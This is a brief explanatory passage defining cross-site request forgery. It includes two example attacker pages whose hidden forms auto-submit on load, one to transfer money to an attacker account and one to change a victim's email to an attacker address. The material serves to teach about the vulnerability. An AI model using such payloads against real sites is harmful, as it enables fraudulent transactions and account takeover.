What is cross-site request forgery?
Cross-site request forgery (CSRF) is a web vulnerability in which an attacker tricks the victim's browser into submitting a request that performs a state-changing action on the victim's behalf; the browser attaches the victim's existing session cookies, so the target site treats the forged request as legitimate. Cross-site request forgery is also called XSRF, sea surf, session riding, or one-click attack.
For example, a page containing the following form submits a transfer request to http://example.com/bank.php as soon as the victim loads it, without any further interaction:
<body onload="document.csrf.submit()">
  <form action="http://example.com/bank.php" method="POST" name="csrf">
    <input type="hidden" name="action" value="transfer">
    <input type="hidden" name="target" value="attacker_account">
  </form>
</body>
The attacker creates a malicious page http://example.attacker/exploit.html with the following content:
<body onload="document.email.submit()">
  <form action="http://example.com/set_email.php" method="post" name="email">
    <input type="hidden" name="email" value="attacker@example.attacker">
  </form>
</body>